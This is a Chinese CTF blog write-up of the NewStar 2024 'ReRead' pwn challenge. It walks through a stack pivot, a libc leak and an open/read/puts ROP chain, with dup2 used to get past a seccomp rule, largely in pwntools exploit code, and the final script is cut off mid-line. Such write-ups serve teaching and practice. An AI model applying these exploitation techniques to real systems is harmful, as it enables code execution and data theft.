<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>2024 NewStar w4 | Chxinen</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="W4ReRead 沙箱args[0] leave_ret栈迁移 dup2 open+read+puts(pl长度不够写open返回地址)开了NX  main函数一个沙箱，一个vuln  沙箱看着也没禁system啊 0x10字节的溢出空间，考虑转到read，换掉rsi，再读入一次  二次读入的内容用orw即可，也可以调用puts泄露真实地址 无rdx但有csu 感觉还是system简单点 要二次调">
<meta property="og:type" content="article">
<meta property="og:title" content="2024 NewStar w4">
<meta property="og:url" content="http://example.com/2024/11/13/w4/index.html">
<meta property="og:site_name" content="Chxinen">
<meta property="og:description" content="W4ReRead 沙箱args[0] leave_ret栈迁移 dup2 open+read+puts(pl长度不够写open返回地址)开了NX  main函数一个沙箱，一个vuln  沙箱看着也没禁system啊 0x10字节的溢出空间，考虑转到read，换掉rsi，再读入一次  二次读入的内容用orw即可，也可以调用puts泄露真实地址 无rdx但有csu 感觉还是system简单点 要二次调">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/css/img/w4/1729512541161.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729512494930.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729512882082.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729513356151.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729513479437.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729559197221.png">
<meta property="og:image" content="http://example.com/css/img/w4/1732022003864.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729562865583.png">
<meta property="og:image" content="http://example.com/css/img/w4/1732021879002.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729565830883.png">
<meta property="og:image" content="http://example.com/css/img/w4/1732021854288.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729582599793.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729592780094.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729592813128.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729593863557.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729467061430.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729467224479.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729467745669.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729467813086.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729468468887.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729468443814.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729506919976.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729506946377.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729507040653.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729688552212.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729688640864.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729688466869.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729688793270.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729689848206.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729692189381.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729693131036.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729726653276.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729726784846.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729736077868.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729740268692.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729744592450.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729752618491.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729755147714.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729930232241.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729508463201.png">
<meta property="og:image" content="http://example.com/css/img/w4/1732021751808.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729508369810.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729762454472.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729762802816.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729762916971.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729943207530.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729943169373.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729943442368.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729943737049.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729943770487.png">
<meta property="og:image" content="http://example.com/css/img/w4/1729948802797.png">
<meta property="article:published_time" content="2024-11-13T11:48:18.000Z">
<meta property="article:modified_time" content="2024-11-19T13:15:17.988Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="CTF PWN">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/css/img/w4/1729512541161.png">
  
    <link rel="alternate" href="/atom.xml" title="Chxinen" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Chxinen</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-w4" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/11/13/w4/" class="article-date">
  <time class="dt-published" datetime="2024-11-13T11:48:18.000Z" itemprop="datePublished">2024-11-13</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      2024 NewStar w4
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h2 id="W4"><a href="#W4" class="headerlink" title="W4"></a>W4</h2><h3 id="ReRead-沙箱args-0-leave-ret栈迁移-dup2-open-read-puts-pl长度不够写open返回地址"><a href="#ReRead-沙箱args-0-leave-ret栈迁移-dup2-open-read-puts-pl长度不够写open返回地址" class="headerlink" title="ReRead 沙箱args[0] leave_ret栈迁移 dup2 open+read+puts(pl长度不够写open返回地址)"></a>ReRead 沙箱args[0] leave_ret栈迁移 dup2 open+read+puts(pl长度不够写open返回地址)</h3><p>开了NX</p>
<p><img src="/../css/img/w4/1729512541161.png"></p>
<p>main函数一个沙箱，一个vuln</p>
<p><img src="/../css/img/w4/1729512494930.png"></p>
<p>沙箱看着也没禁system啊</p>
<p>0x10字节的溢出空间，考虑转到read，换掉rsi，再读入一次</p>
<p><img src="/../css/img/w4/1729512882082.png"></p>
<p>二次读入的内容用orw即可，也可以调用puts泄露真实地址</p>
<p>无rdx但有csu</p>
<p>感觉还是system简单点</p>
<p>要二次调用read肯定不能传参，毕竟只有八字节的ret</p>
<p><img src="/../css/img/w4/1729513356151.png"></p>
<p>rsi由rax传值，rax的值为[rbp - 0x40]，即buf的初始8字节</p>
<p>写入地址可以用这一段，可以写进去pop rdi之类的，但这段不可执行，所以不能直接在返回地址写入这一段的地址，而是要用栈迁移，把这一段当作栈，用ret将栈中的可执行内容赋予rip</p>
<p><img src="/../css/img/w4/1729513479437.png"></p>
<p>调试的时候卡在puts，远程有地址回显但最后EOF</p>
<p>换下本地libc</p>
<p>这题没有给ld，需要自己找（看版本然后glibc-all-in-one）</p>
<p><img src="/../css/img/w4/1729559197221.png"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 栈迁移尝试使用system</span></span><br><span class="line">pl1 = <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x40</span></span><br><span class="line">pl1 += p64(rbp_addr) <span class="comment"># lea rax, [rbp-0x40]</span></span><br><span class="line">pl1 += p64(back_addr)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.send(pl1)</span><br><span class="line"><span class="built_in">print</span>(p.recvline())</span><br><span class="line">pl2 = p64(rbp_addr + <span class="number">0x100</span>) <span class="comment"># 0x404100 =&gt; rbp for pl3</span></span><br><span class="line">pl2 += p64(pop_rdi_ret) <span class="comment"># 0x404108 mov rsp,rbp; pop rbp</span></span><br><span class="line">pl2 += p64(read_got) </span><br><span class="line">pl2 += p64(puts_plt)</span><br><span class="line">pl2 += p64(back_addr)</span><br><span class="line">pl2 = pl2.ljust(<span class="number">0x40</span>, <span class="string">b&#x27;\x01&#x27;</span>)</span><br><span class="line">pl2 += p64(rbp_addr - <span class="number">0x40</span>) <span class="comment"># pop rbp =&gt; rsp-8 for pl2</span></span><br><span class="line">pl2 += p64(leave_ret)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.send(pl2)</span><br><span class="line"><span class="built_in">print</span>(p.recvline())</span><br><span class="line">read_addr = u64(p.recvuntil(<span class="string">b&#x27;\n&#x27;</span>,drop=<span class="literal">True</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(read_addr))</span><br><span class="line">libc_base = read_addr - libc.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">system_addr = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(system_addr))</span><br><span class="line">bin_sh_addr = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(bin_sh_addr))</span><br><span class="line"></span><br><span class="line">pl3 = p64(pop_rdi_ret) <span class="comment"># 0x404200</span></span><br><span class="line">pl3 += p64(bin_sh_addr)</span><br><span class="line">pl3 += p64(system_addr)</span><br><span class="line">pl3 = pl3.ljust(<span class="number">0x40</span>, <span class="string">b&#x27;\x09&#x27;</span>)</span><br><span class="line">pl3 += p64(rbp_addr + <span class="number">0x100</span> - <span class="number">0x48</span>) <span class="comment"># 0x404100 pop rbp</span></span><br><span class="line">pl3 += p64(leave_ret)</span><br></pre></td></tr></table></figure>

<p>卡在system里，进不可执行段了，segmentation fault。</p>
<p>orw长度不够，除非调用read并把rdx参数改了（光改read都很勉强）</p>
<p>改rdx，出错</p>
<p><img src="/../css/img/w4/1732022003864.png" alt="1732022003864"></p>
<p>找源头，是这里把rsp减到不可执行段的，把栈迁移位置总体向高地址移动</p>
<p><img src="/../css/img/w4/1729562865583.png"></p>
<p>然后卡了在rep stosq，这是个多次执行的指令，次数由rcx决定</p>
<p>成功到system，但返回调用错误&#x3D;&gt;沙箱造成的</p>
<p>仔细看发现沙箱限制syscall，只能想办法orw了</p>
<p>能不能用open，read，put呢？为什么一定要write传3个参数？</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 尝试open,read,puts</span></span><br><span class="line">pl2 = p64(rbp_addr + <span class="number">0x100</span>) <span class="comment"># 0x404600   p64(0x404640 + 0x100) = 0x404740 =&gt; pl3&#x27;s read begin point, will be covered</span></span><br><span class="line">pl2 += p64(pop_rdi_ret) <span class="comment"># 0x404608 mov rsp,rbp; pop rbp</span></span><br><span class="line">pl2 += p64(read_got) </span><br><span class="line">pl2 += p64(puts_plt)</span><br><span class="line">pl2 += p64(back_addr)</span><br><span class="line">pl2 += <span class="string">b&#x27;./flag\x00\x00&#x27;</span></span><br><span class="line">pl2 = pl2.ljust(<span class="number">0x40</span>, <span class="string">b&#x27;\x01&#x27;</span>)</span><br><span class="line">pl2 += p64(rbp_addr - <span class="number">0x40</span>) <span class="comment"># pop rbp =&gt; rsp-8 for pl2</span></span><br><span class="line">pl2 += p64(leave_ret)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.send(pl2)</span><br><span class="line"><span class="built_in">print</span>(p.recvline())</span><br><span class="line">read_addr = u64(p.recvuntil(<span class="string">b&#x27;\n&#x27;</span>,drop=<span class="literal">True</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(read_addr))</span><br><span class="line">libc_base = read_addr - libc.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">open_addr = libc_base + libc.symbols[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line">flag_addr = <span class="number">0x404628</span></span><br><span class="line"></span><br><span class="line">pl3 = p64(<span class="number">0x404140</span>) <span class="comment"># 0x404700</span></span><br><span class="line">pl3 += p64(pop_rdi_ret) <span class="comment"># 0x404708</span></span><br><span class="line">pl3 += p64(flag_addr)</span><br><span class="line">pl3 += p64(open_addr) <span class="comment"># rsi??</span></span><br><span class="line">pl3 += p64(back_addr)</span><br><span class="line">pl3 += p64(pop_rdi_ret) </span><br><span class="line">pl3 += p64(<span class="number">0x404100</span>)</span><br><span class="line">pl3 += p64(puts_plt)</span><br><span class="line">pl3 += p64(rbp_addr + <span class="number">0x100</span> - <span class="number">0x40</span>) <span class="comment"># 0x404100 pop rbp</span></span><br><span class="line">pl3 += p64(leave_ret)</span><br></pre></td></tr></table></figure>

<p>调用的是openat，rax为0x101，给rax赋值后成功调用</p>
<p><img src="/../css/img/w4/1732021879002.png" alt="1732021879002"></p>
<p><img src="/../css/img/w4/1729565830883.png"></p>
<p>刚开始想的是直接调用read_plt，但0x50的长度不够写返回值，于是多次回vuln</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 直接调用read_plt</span></span><br><span class="line">pl4 = p64(pop_rdi_ret) <span class="comment"># 0x404638</span></span><br><span class="line">pl4 += p64(<span class="number">0</span>) <span class="comment"># 0x404640</span></span><br><span class="line">pl4 += p64(pop_rsi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x404100</span>) </span><br><span class="line">pl4 += p64(pop_rdx_r12_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x200</span>)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(read_plt)</span><br><span class="line">pl4 += p64(<span class="number">0x404638</span> - <span class="number">8</span>) <span class="comment"># pop rbp 缺一个返回值</span></span><br><span class="line">pl4 += p64(leave_ret)</span><br><span class="line">pause()</span><br><span class="line">p.send(pl4)</span><br><span class="line"></span><br><span class="line">pl3 = p64(pop_rdi_ret) <span class="comment"># 0x404638</span></span><br><span class="line">pl3 += p64(flag_addr) <span class="comment"># 40</span></span><br><span class="line">pl3 += p64(pop_rax_ret)</span><br><span class="line">pl3 += p64(<span class="number">2</span>) </span><br><span class="line">pl3 += p64(pop_rsi_ret)</span><br><span class="line">pl3 += p64(<span class="number">0</span>)</span><br><span class="line">pl3 += p64(syscall_addr) <span class="comment"># open</span></span><br><span class="line">pl3 += p64(pop_rdi_ret) <span class="comment"># 0x404638</span></span><br><span class="line">pl3 = p64(<span class="number">3</span>) <span class="comment"># 0x404640</span></span><br><span class="line">pl3 += p64(pop_rsi_ret)</span><br><span class="line">pl3 += p64(<span class="number">0x404100</span>) </span><br><span class="line">pl3 += p64(pop_rdx_r12_ret)</span><br><span class="line">pl3 += p64(<span class="number">0x30</span>)</span><br><span class="line">pl3 += p64(<span class="number">0</span>)</span><br><span class="line">pl3 += p64(read_plt)</span><br><span class="line">pl3 += p64(pop_rdi_ret) <span class="comment"># 0x404548</span></span><br><span class="line">pl3 += p64(<span class="number">0x404100</span>)</span><br><span class="line">pl3 += p64(puts_plt)</span><br><span class="line">pause()</span><br><span class="line">p.send(pl3)</span><br><span class="line"><span class="built_in">print</span>(p.recv())</span><br></pre></td></tr></table></figure>

<p>但send(pl4)的时候发现此时会连续调用两次输入的read，根本不理我传的参数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 每次都利用back_addr回到vuln中的read</span></span><br><span class="line">pl3 = p64(pop_rdi_ret) <span class="comment"># 0x404638</span></span><br><span class="line">pl3 += p64(flag_addr) <span class="comment"># 40</span></span><br><span class="line">pl3 += p64(pop_rax_ret)</span><br><span class="line">pl3 += p64(<span class="number">2</span>) </span><br><span class="line">pl3 += p64(pop_rsi_ret)</span><br><span class="line">pl3 += p64(<span class="number">0</span>)</span><br><span class="line">pl3 += p64(syscall_addr) <span class="comment"># open</span></span><br><span class="line">pl3 += p64(back_addr)</span><br><span class="line">pl3 += p64(<span class="number">0x404638</span> - <span class="number">0x8</span>) <span class="comment"># 0x404678 pop rbp</span></span><br><span class="line">pl3 += p64(leave_ret)</span><br><span class="line">pause()</span><br><span class="line">p.send(pl3)</span><br><span class="line"></span><br><span class="line">pl4 = p64(<span class="number">3</span>) <span class="comment"># 0x404640</span></span><br><span class="line">pl4 += p64(pop_rsi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x404100</span>) </span><br><span class="line">pl4 += p64(pop_rdx_r12_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x30</span>)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(read_plt)</span><br><span class="line">pl4 += p64(back_addr)</span><br><span class="line">pl4 += p64(<span class="number">0x404638</span> - <span class="number">0x8</span>) <span class="comment"># pop rbp</span></span><br><span class="line">pl4 += p64(leave_ret)</span><br><span class="line">pause()</span><br><span class="line">p.send(pl4)</span><br><span class="line"></span><br><span class="line">pl5 = p64(<span class="number">0xdeadbeef</span>) <span class="comment"># 0x404540</span></span><br><span class="line">pl5 += p64(pop_rdi_ret) <span class="comment"># 0x404548</span></span><br><span class="line">pl5 += p64(<span class="number">0x404100</span>)</span><br><span class="line">pl5 += p64(puts_plt)</span><br><span class="line">pl5 = pl5.ljust(<span class="number">0x40</span>, <span class="string">b&#x27;\x05&#x27;</span>)</span><br><span class="line">pl5 += p64(<span class="number">0x404540</span>)</span><br><span class="line">pl5 += p64(leave_ret)</span><br><span class="line">pause()</span><br><span class="line">p.send(pl5)</span><br></pre></td></tr></table></figure>

<p>那只能考虑一次传完，关键在于read_plt返回地址应该怎么写</p>
<p>这里是将read_plt的rsi参数设为pl4起始地址，即返回到栈迁移的pop_rdi_ret</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># read_plt一次传完</span></span><br><span class="line">pl3 = p64(pop_rdi_ret) <span class="comment"># 0x404638</span></span><br><span class="line">pl3 += p64(<span class="number">0</span>) <span class="comment"># 0x404640</span></span><br><span class="line">pl3 += p64(pop_rsi_ret)</span><br><span class="line">pl3 += p64(<span class="number">0x404678</span>) </span><br><span class="line">pl3 += p64(pop_rdx_r12_ret)</span><br><span class="line">pl3 += p64(<span class="number">0x200</span>)</span><br><span class="line">pl3 += p64(<span class="number">0</span>)</span><br><span class="line">pl3 += p64(read_plt) <span class="comment"># 70</span></span><br><span class="line">pl3 += p64(<span class="number">0x404638</span> - <span class="number">8</span>) <span class="comment"># pop rbp</span></span><br><span class="line">pl3 += p64(leave_ret)</span><br><span class="line">pause()</span><br><span class="line">p.send(pl3)</span><br><span class="line"></span><br><span class="line">pl4 = p64(pop_rdi_ret) <span class="comment"># 0x404678 read_plt&#x27;s ret</span></span><br><span class="line">pl4 += p64(flag_addr)</span><br><span class="line">pl4 += p64(pop_rax_ret)</span><br><span class="line">pl4 += p64(<span class="number">2</span>) </span><br><span class="line">pl4 += p64(pop_rsi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(syscall_addr) <span class="comment"># open</span></span><br><span class="line">pl4 += p64(pop_rdi_ret) </span><br><span class="line">pl4 += p64(<span class="number">3</span>)</span><br><span class="line">pl4 += p64(pop_rsi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x404100</span>) </span><br><span class="line">pl4 += p64(pop_rdx_r12_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x30</span>)</span><br><span class="line">pl4 += p64(<span class="number">0</span>)</span><br><span class="line">pl4 += p64(read_plt)</span><br><span class="line">pl4 += p64(pop_rdi_ret)</span><br><span class="line">pl4 += p64(<span class="number">0x404100</span>)</span><br><span class="line">pl4 += p64(puts_plt)</span><br><span class="line">pause()</span><br><span class="line">p.send(pl4)</span><br></pre></td></tr></table></figure>

<p>此时rax的确为0……</p>
<p><img src="/../css/img/w4/1732021854288.png" alt="1732021854288"></p>
<p>所以这里的意思是，如果调用read函数就看它的第一个参数，如果不为0就kill</p>
<p><img src="/../css/img/w4/1729582599793.png"></p>
<p>还有一个dup2函数</p>
<p>那调用dup2即可 - &gt; <code>dup2(3,0)</code></p>
<p>系统调用表</p>
<p> <a target="_blank" rel="noopener" href="https://blog.csdn.net/SUKI547/article/details/103315487">Linux系统调用表（64位）_系统调用号表-CSDN博客</a> </p>
<p> dup2-&gt;33 </p>
<p>dup2</p>
<p><img src="/../css/img/w4/1729592780094.png"></p>
<p>read</p>
<p><img src="/../css/img/w4/1729592813128.png"></p>
<p>结果依旧是需要输入</p>
<p>傻了……dup2放在open前了，没open哪来的3</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#完整exp</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> p64</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> u64</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./reread/reread&#x27;</span>)</span><br><span class="line"><span class="comment"># p = remote(&#x27;8.147.132.32&#x27;, 12817)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./reread/reread&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./reread/libc.so.6&#x27;</span>)</span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.log_level = &#x27;debug&#x27;</span></span><br><span class="line">read_plt = elf.plt[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">read_got = elf.got[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">back_addr = <span class="number">0x4013AC</span></span><br><span class="line"><span class="comment"># back_addr =0x4013BD</span></span><br><span class="line">pop_rdi_ret = <span class="number">0x401473</span></span><br><span class="line">rbp_addr = <span class="number">0x404600</span> + <span class="number">0x40</span> <span class="comment"># 0x404640</span></span><br><span class="line">leave_ret = <span class="number">0x4013CF</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&quot;Ok let&#x27;s try your best!!\xf0\x9f\x98\x8b\x0a&quot;</span>)</span><br><span class="line"><span class="comment"># pl1 = p64(buf_addr) leave</span></span><br><span class="line">pl1 = <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x40</span></span><br><span class="line">pl1 += p64(rbp_addr) <span class="comment"># lea rax, 